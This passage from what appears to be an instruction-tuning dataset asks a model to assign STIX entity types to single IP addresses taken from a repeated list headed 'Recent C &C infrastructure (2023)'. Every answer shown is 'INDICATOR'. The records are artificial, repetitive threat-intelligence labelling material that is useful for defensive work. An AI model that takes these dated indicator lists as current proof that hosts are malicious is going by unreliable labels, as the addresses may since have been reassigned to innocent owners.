84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.158.96\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n104.156.230.193\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.56.186\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.128.239\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n143.198.53.203\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 